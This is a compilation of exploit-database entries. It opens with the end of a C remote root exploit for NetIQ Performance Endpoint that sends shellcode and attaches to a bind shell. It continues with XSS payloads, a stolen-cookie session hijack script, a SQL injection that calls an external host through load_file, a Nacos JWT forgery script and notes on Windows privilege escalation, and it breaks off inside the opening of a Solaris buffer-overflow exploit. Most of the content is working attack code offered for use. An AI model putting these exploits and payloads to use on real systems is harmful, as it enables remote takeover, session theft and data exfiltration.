win32_x86_bind, sizeof win32_x86_bind, 0x11c0, 33, 0x488, ARCH_X86 }, { "NetIQ Endpoint 5.1 - Microsoft Windows (universal)", win32_x86_bind, sizeof win32_x86_bind, 0x11c0, 33, 0x480, ARCH_X86 }, { "NetIQ Endpoint 5.1 - FreeBSD (universal)", freebsd_x86_bind, sizeof freebsd_x86_bind, 0x11c0, 29, 0x3FC, ARCH_X86 }, { "NetIQ Endpoint 5.1 - Solaris SPARC (universal)", solaris_sparc_bind, sizeof solaris_sparc_bind, 0x1080, 29, 0x400, ARCH_SPARC }, { "NetIQ Endpoint 5.1 - Solaris x86 (universal)", solaris_x86_bind, sizeof solaris_x86_bind, 0x11c0, 29, 0x400, ARCH_X86 }, {0} }; static const char *quotes[] = { " \"No executable code (like Java or Visual Basic) is sent. There is no way\n" " to do something like 'run this command.' 100,000’s of endpoints have been\n" " installed worldwide without incident.\"", " \"Endpoints do rigorous internal validation. For example, endpoints are not\n" " susceptible to 'buffer overrun' attacks used by hackers.\"" }; static int verbose = 1; /* verbosity */ static int ppid, cpid; /* parent and child process id's */ static int get_localip_getifaddrs (in_addr_t *); static int sock_send (int, char *, int); static int sock_recv (int, char *, int); static int sock_recv_str (int, char *, int); static void shellami (int); static void fatal (void) { kill (0, SIGKILL); exit (EXIT_FAILURE); } static int get_localip_getifaddrs (in_addr_t *ip_addr) { struct ifaddrs *ifa_head; int result; result = -1; if (getifaddrs (&ifa_head) == 0) { struct ifaddrs *ifa_cur; for (ifa_cur = ifa_head; ifa_cur; ifa_cur = ifa_cur->ifa_next) { if (ifa_cur->ifa_name != NULL && ifa_cur->ifa_addr != NULL) { if (ifa_cur->ifa_addr->sa_family != AF_INET || !(ifa_cur->ifa_flags & IFF_UP)) continue; if (ifa_cur->ifa_flags & IFF_LOOPBACK) continue; memcpy (ip_addr, &((struct sockaddr_in *) ifa_cur->ifa_addr)->sin_addr, sizeof *ip_addr); result = 0; break; } } freeifaddrs (ifa_head); } return (result); } static int sock_send (int fd, char *src, int len) { int n; if ((n = send (fd, src, len, 0)) < 0) { perror ("send()"); exit (EXIT_FAILURE); } return (n); } static int sock_recv (int fd, char *dst, int len) { int n; if ((n = recv (fd, dst, len, 0)) < 0) { perror ("recv()"); exit (EXIT_FAILURE); } return (n); } static int sock_recv_str (int fd, char *dst, int len) { int n = sock_recv (fd, dst, len - 1); dst[n] = '\0'; return (n); } static void shellami (int fd) { int n; fd_set rset; char rbuf[1024]; while (1) { FD_ZERO (&rset); FD_SET (fd, &rset); FD_SET (STDIN_FILENO, &rset); if (select (fd + 1, &rset, NULL, NULL, NULL) < 0) { perror ("select()"); fatal (); } if (FD_ISSET (fd, &rset)) { if ((n = sock_recv_str (fd, rbuf, sizeof (rbuf) - 1)) <= 0) { fprintf (stderr, "Connection closed by foreign host.\n"); exit (EXIT_SUCCESS); } printf ("%s", rbuf); fflush (stdout); } if (FD_ISSET (STDIN_FILENO, &rset)) { if ((n = read (STDIN_FILENO, rbuf, sizeof (rbuf) - 1)) > 0) { rbuf[n] = '\0'; sock_send (fd, rbuf, n); } } } } static int sockami (char *host, int port) { struct sockaddr_in address; struct hostent *hp; int fd; fflush (stdout); if ((fd = socket (AF_INET, SOCK_STREAM, 0)) == -1) { perror ("socket()"); exit (EXIT_FAILURE); } if ((hp = gethostbyname (host)) == NULL) { perror ("gethostbyname()"); exit (EXIT_FAILURE); } memset (&address, 0, sizeof (address)); memcpy ((char *) &address.sin_addr, hp->h_addr, hp->h_length); address.sin_family = AF_INET; address.sin_port = htons (port); if (connect (fd, (struct sockaddr *) &address, sizeof (address)) < 0) { perror ("connect()"); return (-1); } return (fd); } int endpt_add_string (char *buf, char *str) { unsigned int str_len; unsigned short str_lens; assert (buf != NULL && str != NULL); str_len = 2 + strlen (str) + 1; str_lens = htons (str_len); /* add the string length and copy, including NULL */ *((unsigned short *) buf) = str_lens; memcpy (buf + 2, str, str_len - 2); return (str_len); } char * endpt_read_packet (int fd, char *buf) { unsigned short pkt_len; int n; n = sock_recv (fd, (char *) &pkt_len, sizeof pkt_len); if (n < 2) { fprintf (stderr, "endpt_read_packet: failed reading length!\n"); return (NULL); } pkt_len = ntohs (pkt_len); if (pkt_len > ENDPT_PKTMAX) { fprintf (stderr, "endpt_read_packet: invalid packet length!\n"); return (NULL); } n = sock_recv (fd, buf, pkt_len - 2); if (n < pkt_len - 2) { fprintf (stderr, "endpt_read_packet: failed reading packet (%d read, need %d)!\n", n, pkt_len); return (NULL); } return (buf); } char * endpt_create_packet (char *buf, unsigned int len) { char *pkt_buf; unsigned int pkt_len; unsigned short pkt_lens; assert (buf != NULL && len > 0); assert (len <= UINT_MAX - 2); assert (len <= ENDPT_PKTMAX - 2); pkt_len = 2 + len; pkt_buf = malloc (pkt_len * sizeof (char)); if (pkt_buf == NULL) return (NULL); pkt_lens = htons (pkt_len); /* add the packet length and copy */ *((unsigned short *) pkt_buf) = pkt_lens; memcpy (pkt_buf + 2, buf, len); return (pkt_buf); } void endpt_listen_child (char *thost, struct target_t *trgt) { struct sockaddr_in servaddr, cliaddr; char pkt_buf[ENDPT_PKTMAX-2], *pkt_ptr, *ptr; unsigned int var_30_ptr; int lfd, cfd, sfd, pid; socklen_t clilen; sleep (1); pid = getpid (); if ((lfd = socket (PF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) { perror ("socket()"); fatal (); } memset (&servaddr, 0, sizeof servaddr); servaddr.sin_family = AF_INET; servaddr.sin_addr.s_addr = htonl (INADDR_ANY); servaddr.sin_port = htons (ENDPT_TCP_PORT); if (bind (lfd, (struct sockaddr *) &servaddr, sizeof servaddr) < 0) { perror ("bind()"); fatal (); } if (listen (lfd, 2) < 0) { perror ("listen()"); fatal (); } clilen = sizeof cliaddr; if ((cfd = accept (lfd, (struct sockaddr *) &cliaddr, &clilen)) < 0) { perror ("accept()"); fatal (); } printf ("[child-%d] connection accepted from %s:%d\n", pid, inet_ntoa (cliaddr.sin_addr), ntohs (cliaddr.sin_port)); printf ("[child-%d] reading first packet...", pid); /* read dummy packet */ if ((ptr = endpt_read_packet (cfd, pkt_buf)) == NULL) { close (cfd); fatal (); } printf ("done\n"); printf ("[child-%d] sending first reply...", pid); pkt_ptr = endpt_create_packet (cpkt_buf1, sizeof cpkt_buf1 - 1); sock_send (cfd, pkt_ptr, (sizeof cpkt_buf1 - 1) + 2); free (pkt_ptr); printf ("done\n"); printf ("[child-%d] reading second packet...", pid); /* read dummy packet */ if ((ptr = endpt_read_packet (cfd, pkt_buf)) == NULL) { close (cfd); fatal (); } printf ("done\n"); printf ("[child-%d] reading third packet...", pid); if ((ptr = endpt_read_packet (cfd, pkt_buf)) == NULL) { close (cfd); fatal (); } memcpy (&var_30_ptr, pkt_buf + 3, sizeof var_30_ptr); printf ("done\n"); printf ("[child-%d] MAGIC COOKIE: 0x%08x\n", pid, var_30_ptr); memcpy (&cpkt_buf2[3], &var_30_ptr, sizeof var_30_ptr); printf ("[child-%d] reading fourth packet...", pid); /* read dummy packet */ if ((ptr = endpt_read_packet (cfd, pkt_buf)) == NULL) { close (cfd); fatal (); } printf ("done\n"); printf ("[child-%d] reading fifth packet...", pid); if ((ptr = endpt_read_packet (cfd, pkt_buf)) == NULL) { close (cfd); fatal (); } memcpy (&var_30_ptr, pkt_buf + 3, sizeof var_30_ptr); printf ("done\n"); printf ("[child-%d] MAGIC COOKIE: 0x%08x\n", pid, var_30_ptr); memcpy (&cpkt_buf2[3], &var_30_ptr, sizeof var_30_ptr); printf ("[child-%d] sending second reply...", pid); pkt_ptr = endpt_create_packet (cpkt_buf2, sizeof cpkt_buf2 - 1); sock_send (cfd, pkt_ptr, (sizeof cpkt_buf2 - 1) + 2); free (pkt_ptr); printf ("done\n"); printf ("[child-%d] sending evil buffer...", pid); ptr = pkt_buf; if (trgt->arch == ARCH_X86) { memcpy (ptr, x86_evil_len, sizeof x86_evil_len); ptr += sizeof x86_evil_len - 1; memset (ptr, X86_NOP_BYTE, 0x11c0 - 2); } else if (trgt->arch == ARCH_SPARC) { int i; for (i = 0; i < 2; i++, ptr += sizeof sparc_evil_len - 1) memcpy (ptr, sparc_evil_len, sizeof sparc_evil_len); for (i = 0; i < 80; i++, ptr += sizeof sparc_nop - 1) memcpy (ptr, sparc_nop, sizeof sparc_nop); } else { fprintf (stderr, "opps\n"); exit (EXIT_FAILURE); } memcpy (&pkt_buf[256], trgt->zshell, trgt->zshell_len - 1); sock_send (cfd, pkt_buf, trgt->zshell_pkt_len); printf ("done\n"); printf ("[child-%d] sending hammer buffer...", pid); ptr = pkt_buf; memcpy (ptr, hammer_buf, sizeof hammer_buf); memcpy (&pkt_buf[5], &var_30_ptr, sizeof var_30_ptr); if (trgt->arch == ARCH_SPARC) var_30_ptr = ntohl (var_30_ptr); var_30_ptr -= trgt->fp_offset - 0x08; if (trgt->arch == ARCH_SPARC) var_30_ptr = htonl (var_30_ptr); memcpy (&pkt_buf[trgt->fp_indx], &var_30_ptr, sizeof var_30_ptr); sock_send (cfd, pkt_buf, sizeof hammer_buf - 1); printf ("done\n"); printf ("[child-%d] waiting for the shellcode to be executed...\n", pid); sleep (3); if ((sfd = sockami (thost, PORT_SHELL)) != -1) { printf ("+Wh00t!\n\n"); shellami (sfd); } sleep (1); close (cfd); } void endpt_parent (char *thost) { struct in_addr ip_addr; char ip_buf[IPV4_BUFLEN], pkt_buf[ENDPT_PKTMAX-2], *pkt_ptr, *ptr; int fd; get_localip_getifaddrs (&ip_addr.s_addr); strncpy (ip_buf, inet_ntoa (ip_addr), sizeof ip_buf); ip_buf[sizeof ip_buf - 1] = '\0'; if (verbose) fprintf (stderr, "[parent-%d] source address %s\n", ppid, ip_buf); fflush (stdout); printf ("[parent-%d] connecting to %s:%d...", ppid, thost, ENDPT_TCP_PORT); if ((fd = sockami (thost, ENDPT_TCP_PORT)) < 0) fatal (); printf ("done\n"); printf ("[parent-%d] building first packet...", ppid); ptr = pkt_buf; memcpy (ptr, ppkt_buf1, sizeof ppkt_buf1); ptr += sizeof ppkt_buf1 - 1; /* add the connect-back IP */ ptr += endpt_add_string (ptr, ip_buf); memcpy (ptr, ppkt_buf1_end, sizeof ppkt_buf1_end); ptr += sizeof ppkt_buf1_end - 1; pkt_ptr = endpt_create_packet (pkt_buf, ptr - pkt_buf); printf ("done\n"); sock_send (fd, pkt_ptr, (ptr - pkt_buf) + 2); free (pkt_ptr); printf ("[parent-%d] building second packet...", ppid); ptr = pkt_buf; memcpy (ptr, ppkt_buf2, sizeof ppkt_buf2); ptr += sizeof ppkt_buf2 - 1; /* add the connect-back IP */ ptr += endpt_add_string (ptr, ip_buf); memcpy (ptr, ppkt_buf2_end, sizeof ppkt_buf2_end); ptr += sizeof ppkt_buf2_end - 1; pkt_ptr = endpt_create_packet (pkt_buf, ptr - pkt_buf); printf ("done\n"); sock_send (fd, pkt_ptr, (ptr - pkt_buf) + 2); printf ("[parent-%d] building third packet...done\n", ppid); sock_send (fd, pkt_ptr, (ptr - pkt_buf) + 2); free (pkt_ptr); sleep (2); printf ("[parent-%d] closing socket...done\n", ppid); close (fd); } int main (int argc, char **argv) { struct target_t *trgt; int i, cret; printf ("NetIQ Performance Endpoint <=5.1 remote root/SYSTEM exploit\n" "by: <[email protected]>\n" "http://www.digit-labs.org/ -- Digit-Labs 2007!@$!\n\n"); if (argc <= 2) { fprintf (stderr, "Usage: %s <host> <target>\n", argv[0]); for (i = 0; targets[i].name; i++) fprintf (stderr, "\t%d) %s\n", i, targets[i].name); fprintf (stderr, "\n"); exit (EXIT_SUCCESS); } if (atoi (argv[2]) >= NUM_TARGETS) { fprintf (stderr, "Only %d targets known!!\n", NUM_TARGETS); exit (EXIT_SUCCESS); } trgt = &targets[atoi (argv[2])]; printf ("Target: %s\n\n", trgt->name); srand (time (NULL)); printf ("%s\n\t- https://tinyurl.com/lgmblyj\n\n", quotes[rand() & 1]); ppid = getpid (); if ((cpid = fork ()) < 0) { perror ("fark()"); exit (EXIT_FAILURE); } else if (cpid == 0) { /* child */ endpt_listen_child (argv[1], trgt); exit (EXIT_SUCCESS); } /* parent */ endpt_parent (argv[1]); /* wait for child */ wait (&cret); if (verbose) fprintf (stderr, "[parent-%d] child-%d exited %d\n", ppid, cpid, cret); return (EXIT_SUCCESS); }

# Exploit Title: ELSI Smart Floor V3.3.3 - Stored Cross-Site Scripting (XSS) # Date: 12/09/2022 # Exploit Author: Rob, CTRL Group # Vendor Homepage: marigroup.com # Version: V3.3.3 and under # Tested on: Windows IIS all versions # CVE : CVE-2022-35543 “Stored Cross-Site Scripting” Vulnerability within the Elsi Smart Floor software. This vulnerability does require authentication however, once the payload is stored, any user visiting the portal will trigger the alert. Login to the appplication Browse to "Settings" tab and tehn " Wards". Create a new word with the following payload at the ward name: <script>alert(document.cookie)</script> Any user browsing the application will trigger the payload.

## Exploit Title: pimCore v5.4.18-skeleton - Sensitive Cookie with Improper SameSite Attribute ## Author: nu11secur1ty ## Date: 01.11.2023 ## Vendor: https://pimcore.com/en ## Software: https://packagist.org/packages/pimcore/skeleton ## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/pimcore/pimCore-5.4.18-skeleton ## Description: The pimCore-5.4.18-skeleton suffers from Sensitive Cookie with Improper SameSite Attribute vulnerability - PHPSESSID cookie Session management connection requests are not sanitizing correctly. There are no securing changes in PHPSESSID cookies for every request - validating sessions and changing a cookie for every connection - POST Request. The attacker in the same network can trick the user - the administrator of this system and can steal his cookie, then he can make very evil things by using the same session from the name of the already authenticated user - administrator, on a couple of PCs with different IPs which are used from different machines into that network. When the attacker steals the cookie, he can manipulate the same session, for example, he can log out or do very malicious stuff. This is a very stupid developer's error, and this can be very dangerous for the owner of the system. The attack is possible also in the external network! ## STATUS: HIGH Vulnerability [+] Payload: ```Python #!/usr/bin/python3 # @nu11secur1ty 2023 import time from selenium import webdriver driver = webdriver.Chrome() print("Give the stolen cookie...\n") cookie = input() print("Give the domain or IP of the owner of the cookie...\n") target = input() driver.maximize_window() driver.get(target+ 'admin/?_dc=1673370965&perspective=') driver.add_cookie({'name': 'PHPSESSID', 'value': cookie}) print(driver.get_cookie('PHPSESSID')) driver.get(target+ 'admin/?_dc=1673370965&perspective=') time.sleep(3) print("Press any key to stop the exploit...\n") input() print("Your PHPSESSID is PWNED") ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/pimcore/pimCore-5.4.18-skeleton) ## Reference: [href](https://portswigger.net/web-security/csrf/bypassing-samesite-restrictions) ## Proof and Exploit: [href](https://streamable.com/lorw8x) ## Time spent `03:00:00` ## Writing an exploit `00:25:00` -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html and https://www.exploit-db.com/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/>

## Title: ChiKoi-1.0 SQLi ## Author: nu11secur1ty ## Date: 01.12.2023 ## Vendor: https://chikoiquan.tanhongit.com/ ## Software: https://github.com/tanhongit/new-mvc-shop/releases/tag/v1.0 ## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/tanhongit/2023/ChiKoi ## Description: The `User-Agent` HTTP header appears to be vulnerable to SQL injection attacks. The payload '+(select load_file('\\\\v3z9cjkbngnzrm7piruwhl6olfr8fzknbqzlmba0.glumar.com\\quv'))+' was submitted in the User-Agent HTTP header. This payload injects a SQL sub-query that calls MySQL's load_file function with a UNC file path that references a URL on an external domain. The attacker can steal all information from this system and can seriously harm the users of this system, such as extracting bank accounts through which they pay each other, etc. ## STATUS: HIGH Vulnerability - CRITICAL [+] Payload: ```MySQL --- Parameter: User-Agent (User-Agent) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment) Payload: Mozilla/5.0 (Windows; U; Windows NT 6.1; hu; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)' WHERE 2474=2474 AND 9291=(SELECT (CASE WHEN (9291=9291) THEN 9291 ELSE (SELECT 4553 UNION SELECT 6994) END))-- - Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: Mozilla/5.0 (Windows; U; Windows NT 6.1; hu; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)' WHERE 4578=4578 AND (SELECT 8224 FROM(SELECT COUNT(*),CONCAT(0x71706b7171,(SELECT (ELT(8224=8224,1))),0x716a6a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- VCWR --- ``` [+] Online: ```MySQL --- Parameter: User-Agent (User-Agent) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment) Payload: Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1) Gecko/20060601 Firefox/2.0 (Ubuntu-edgy)' WHERE 8386=8386 AND 8264=(SELECT (CASE WHEN (8264=8264) THEN 8264 ELSE (SELECT 2322 UNION SELECT 6426) END))-- - --- ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/tanhongit/2023/ChiKoi) ## Proof and Exploit: [href](https://streamable.com/7x69yz) ## Time spent `01:30:00` ## Writing an exploit `00:05:00` System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/https://cve.mitre.org/index.html and https://www.exploit-db.com/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/> -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html and https://www.exploit-db.com/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/>

## Title: Windows 11 10.0.22000 - Backup service Privilege Escalation ## Author: nu11secur1ty ## Date: 01.13.2023 ## Vendor: https://www.microsoft.com/ ## Software: https://www.microsoft.com/en-us/software-download/windows11 ## Reference: https://github.com/nu11secur1ty/CVE-mitre/tree/main/2023/CVE-2023-21752 ## Description: Windows 11 Pro build 10.0.22000 Build 22000 suffers from Backup service - Privilege Escalation vulnerability. An attacker who successfully exploited this vulnerability could gain SYSTEM privileges. and could delete data that could include data that results in the service being unavailable. ## STATUS: HIGH Vulnerability - CRITICAL [+] Exploit: [href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/2023/CVE-2023-21752/PoC) ## Reference: [href](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-21752) ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/2023/CVE-2023-21752/PoC) ## Proof and Exploit: [href](https://streamable.com/f2dl3m) -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html https://0day.today/ https://cxsecurity.com/ and https://www.exploit-db.com/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/>

# Exploit Title: Metform Elementor Contact Form Builder v3.1.2 - Unauthenticated Stored Cross-Site Scripting (XSS) # Google Dork: inurl:metform-form intext:textarea|message # Date: 14/01/2023 # Exploit Author: Mohammed Chemouri (https://de.linkedin.com/in/chemouri) # Vendor Homepage: https://wpmet.com/plugin/metform/ # Software Link: https://downloads.wordpress.org/plugin/metform.3.1.2.zip # Version: <= 3.1.2 # Tested on: WordPress version 6.1.1, PHP version 8.0.27 (64bit) # CVE : CVE-2023-0084 Description: An unauthenticated attacker can insert a persistent malicious JavaScript code via the text-area field and because the input is not properly sanitized the XSS will be executed each time the victim visits the affected post. An attacker can steal admin’s session or credentials e.g., using a phishing attack (display fake login page) and may install a JavaScript backdoor like the Browser Exploitation Framework (BeeF). ,etc. Reproduction Steps: 1- Create a new form (using MetForm Elementor widgets) and insert a text-area field and a submit button then publish the form. 2- Visit the created form (no login needed) and insert the following JavaScript code in the text-area and submit: <script>alert(0)</script> 3- By visiting MetForm then Entries from the WP-ADMIN panel and viewing the inserted post the XSS payload will be executed. Because there is may bots scanning the web and trying to brute-force admin's credentials or exploit known vulnerabilities this flaw can be also automated to steal credentials or do actions on behalf of the logged in user or even install a JavaScript worm like the Browser Exploitation Framework (BeeF) and make more than 100,000 websites under a high risk. Remediation: All fields must be properly sanitized and escaped before being displayed in the browser. WordPress already offers an API for this purpose. For more information please refer to: https://developer.wordpress.org/apis/security/common-vulnerabilities/ https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html

# Exploit Title: Nacos 2.0.3 - Access Control vulnerability # Date: 2023-01-17 # Exploit Author: Jenson Zhao # Vendor Homepage: https://nacos.io/ # Software Link: https://github.com/alibaba/nacos/releases/ # Version: Up to (including)2.0.3 # Tested on: Windows 10 # CVE : CVE-2021-43116 # Required before execution: pip install PyJWT,requests import argparse import base64 import requests import time import json from jwt.algorithms import has_crypto, requires_cryptography from jwt.utils import base64url_encode, force_bytes from jwt import PyJWS class MyPyJWS(PyJWS): def encode(self, payload, # type: Union[Dict, bytes] key, # type: str algorithm='HS256', # type: str headers=None, # type: Optional[Dict] json_encoder=None # type: Optional[Callable] ): segments = [] if algorithm is None: algorithm = 'none' if algorithm not in self._valid_algs: pass # Header header = {'alg': algorithm} if headers: self._validate_headers(headers) header.update(headers) json_header = force_bytes( json.dumps( header, separators=(',', ':'), cls=json_encoder ) ) segments.append(base64url_encode(json_header)) segments.append(base64url_encode(payload)) # Segments signing_input = b'.'.join(segments) try: alg_obj = self._algorithms[algorithm] key = alg_obj.prepare_key(key) signature = alg_obj.sign(signing_input, key) except KeyError: if not has_crypto and algorithm in requires_cryptography: raise NotImplementedError( "Algorithm '%s' could not be found. Do you have cryptography " "installed?" % algorithm ) else: raise NotImplementedError('Algorithm not supported') segments.append(base64url_encode(signature)) return b'.'.join(segments) def JwtGenerate(): Secret = 'SecretKey01234567890123456789012345678901234567890123456789012345678' payload = json.dumps( { "sub": "nacos", "exp": int(time.time()) + 3600 }, separators=(',', ':') ).encode('utf-8') encoded_jwt = MyPyJWS().encode(payload, base64.urlsafe_b64decode(Secret), algorithm='HS256') return encoded_jwt.decode() def check(url, https, token): if https: r = requests.get( url='https://' + url + '/nacos/v1/cs/configs?dataId=&group=&appName=&config_tags=&pageNo=1&pageSize=10&tenant=&search=accurate&accessToken=' + token + '&username=', verify=False) else: r = requests.get( url='http://' + url + '/nacos/v1/cs/configs?dataId=&group=&appName=&config_tags=&pageNo=1&pageSize=10&tenant=&search=accurate&accessToken=' + token + '&username=') if r.status_code == 403: print("There is no CVE-2021-43116 problem with the url!") else: print("There is CVE-2021-43116 problem with the url!") if __name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument("-t", "--target", help="URL of the target. example: 192.168.1.1:8848") parser.add_argument("-s", "--https", help="Whether https is used. Default is false") args = parser.parse_args() url = args.target https = False if (args.https): https = args.https if url: check(url, https, JwtGenerate()) else: print('Please enter URL!')

# Exploit Title: HotKey Clipboard 2.1.0.6 - Privilege Escalation Unquoted Service Path # Date: 2023/01/17 # Exploit Author : Wim Jaap van Vliet # Vendor Homepage: www.clevo.com.tw # Software Link: https://enstrong.blob.core.windows.net/en-driver/PDXXPNX1/Others/CC30_1006.zip # Version: 2.1.0.6 # Tested on: Windows 11 Pro 10.0.22000 # Exploit The Hotkey Clipboard Service 'HKClipSvc', installed as part of Control Center3.0 v3.97 (and earlier versions) by Clevo has a unquoted service path. This software package is usually installed on Clevo laptops (or other brands using Clevo barebones) as a driver. This could potentially allow an authorized but non-privileged local user to execute arbitrary code with system privileges on the system. # Information C:\>sc qc "HKClipSvc" [SC] QueryServiceConfig SUCCESS SERVICE_NAME: HKClipSvc TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\ControlCenter\Driver\x64\HKClipSvc.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : HotKey Clipboard Service DEPENDENCIES : SERVICE_START_NAME : LocalSystem

## Exploit Title: Zstore 6.5.4 - Reflected Cross-Site Scripting (XSS) ## Development: nu11secur1ty ## Date: 01.18.2023 ## Vendor: https://zippy.com.ua/ ## Software: https://github.com/leon-mbs/zstore/releases/tag/6.5.4 ## Reproduce: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/zippy/zstore-6.5.4 ## Description: The value of manual insertion point 1 is copied into the HTML document as plain text between tags. The payload giflc<img src=a onerror=alert(1)>c0yu0 was submitted in the manual insertion point 1. This input was echoed unmodified in the application's response. ## STATUS: HIGH Vulnerability [+] Exploit: ```GET GET /index.php?p=App%2fPages%2fChatgiflc%3c%61%20%68%72%65%66%3d%22%68%74%74%70%73%3a%2f%2f%77%77%77%2e%6e%75%31%31%73%65%63%75%72%31%74%79%2e%63%6f%6d%2f%22%3e%3c%69%6d%67%20%73%72%63%3d%68%74%74%70%73%3a%2f%2f%6d%65%64%69%61%2e%74%65%6e%6f%72%2e%63%6f%6d%2f%2d%4b%39%73%48%78%58%41%62%2d%63%41%41%41%41%43%2f%73%68%61%6d%65%2d%6f%6e%2d%79%6f%75%2d%70%61%74%72%69%63%69%61%2e%67%69%66%22%3e%0a HTTP/2 Host: store.zippy.com.ua Cookie: PHPSESSID=f816ed0ddb0c43828cb387f992ac8521; last_chat_id=439 Cache-Control: max-age=0 Sec-Ch-Ua: "Chromium";v="107", "Not=A?Brand";v="24" Sec-Ch-Ua-Mobile: ?0 Sec-Ch-Ua-Platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: https://store.zippy.com.ua/index.php?q=p:App/Pages/Main Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 ``` ## Proof and Exploit: [href](https://streamable.com/tplz84) ## Reference: [href](https://portswigger.net/web-security/cross-site-scripting/reflected) -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/ 0day Exploit DataBase https://0day.today/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/>

/* * Exploit Title: Solaris 10 libXm - Buffer overflow Local privilege escalation * raptor_dtprintlibXmas.c - Solaris 10 CDE #ForeverDay LPE * Copyright (c) 2023 Marco Ivaldi <[email protected]> * * "What has been will be again, * what has been done will be done again; * there is nothing new under the Sun." * -- Ecclesiastes 1:9 * * #Solaris #CDE #0day #ForeverDay #WontFix * * This exploit illustrates yet another way to abuse the infamous dtprintinfo * binary distributed with the Common Desktop Environment (CDE), a veritable * treasure trove for bug hunters since the 1990s. It's not the most reliable * exploit I've ever written, but I'm quite proud of the new vulnerabilities * I've unearthed in dtprintinfo with the latest Solaris patches (CPU January * 2021) applied. The exploit chain is structured as follows: * 1. Inject a fake printer via the printer injection bug I found in lpstat. * 2. Exploit the stack-based buffer overflow I found in libXm ParseColors(). * 3. Enjoy root privileges! * * For additional details on my bug hunting journey and on the vulnerabilities * themselves, you can refer to the official advisory: * https://github.com/0xdea/advisories/blob/master/HNS-2022-01-dtprintinfo.txt * * Usage: * $ gcc raptor_dtprintlibXmas.c -o raptor_dtprintlibXmas -Wall * $ ./raptor_dtprintlibXmas 10.0.0.109:0 * raptor_dtprintlibXmas.c - Solaris 10 CDE #ForeverDay LPE * Copyright (c) 2023 Marco Ivaldi <[email protected]> * * Using SI_PLATFORM : i86pc (5.10) * Using stack base : 0x8047fff * Using safe address : 0x8045790 * Using rwx_mem address : 0xfeffa004 * Using sc address : 0x8047fb4 * Using sprintf() address : 0xfefd1250 * Path of target binary : /usr/dt/bin/dtprintinfo * * On your X11 server: * 1. Select the "fnord" printer, then click on "Selected" > "Properties". * 2. Click on "Find Set" and choose "/tmp/.dt/icons" from the drop-down menu. * * Back to your original shell: * # id * uid=0(root) gid=1(other) * * IMPORTANT NOTE. * The buffer overflow corrupts some critical variables in memory, which we * need to fix. In order to do so, we must patch the hostile buffer at some * fixed locations with the first argument of the last call to ParseColors(). * The easiest way to get such a safe address is via the special 0x41414141 * command-line argument and truss, as follows: * $ truss -fae -u libXm:: ./raptor_dtprintlibXmas 10.0.0.109:0 0x41414141 2>OUT * $ grep ParseColors OUT | tail -1 * 29181/1@1: -> libXm:ParseColors(0x8045770, 0x3, 0x1, 0x8045724) * ^^^^^^^^^ << this is the safe address we need * * Tested on: * SunOS 5.10 Generic_153154-01 i86pc i386 i86pc (CPU January 2021) * [previous Solaris versions are also likely vulnerable] */ #include <fcntl.h> #include <link.h> #include <procfs.h> #include <stdio.h> #include <stdlib.h> #include <strings.h> #include <unistd.h> #include <sys/stat.h> #include <sys/systeminfo.h> #define INFO1 "raptor_dtprintlibXmas.c - Solaris 10 CDE #ForeverDay LPE" #define INFO2 "Copyright (c) 2023 Marco 